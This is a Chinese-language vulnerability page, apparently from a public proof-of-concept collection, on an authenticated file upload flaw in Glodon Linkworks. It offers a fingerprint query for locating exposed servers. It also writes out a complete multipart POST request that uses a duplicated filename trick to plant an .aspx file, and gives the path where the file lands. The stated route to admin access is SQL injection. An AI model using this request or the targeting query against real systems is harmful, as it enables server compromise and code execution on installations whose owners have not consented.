Awesome-POC/Web应用漏洞/广联达 Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞.md
2024-11-06 14:10:36 +08:00

50 lines
1.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 广联达 Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞
## 漏洞描述
广联达 Linkworks msgbroadcastuploadfile.aspx 存在后台文件上传漏洞攻击者通过SQL注入获取管理员信息后可以登陆发送请求包获取服务器权限
## 漏洞影响
广联达 Linkworks
## 网络测绘
```
web.body="/Services/Identification/"
```
## 漏洞复现
登陆页面
![image-20230828150337640](images/image-20230828150337640.png)
GTP.IM.Services.Group.WebSite.GTP.IM.Services.Group 存在文件上传,上传后在当前目录 Upload下
![image-20230828150355277](images/image-20230828150355277.png)
通过SQL注入获取管理员账号密码后登陆后台上传文件,验证POC
```
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Cookie: 0_styleName=styleA
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text
Test
------WebKitFormBoundaryFfJZ4PlAZBixjELj--
```
![image-20230828150407255](images/image-20230828150407255.png)
```
/GTP/IM/Services/Group/Upload/xxx-xxx-test.aspx
```
![image-20230828150419196](images/image-20230828150419196.png)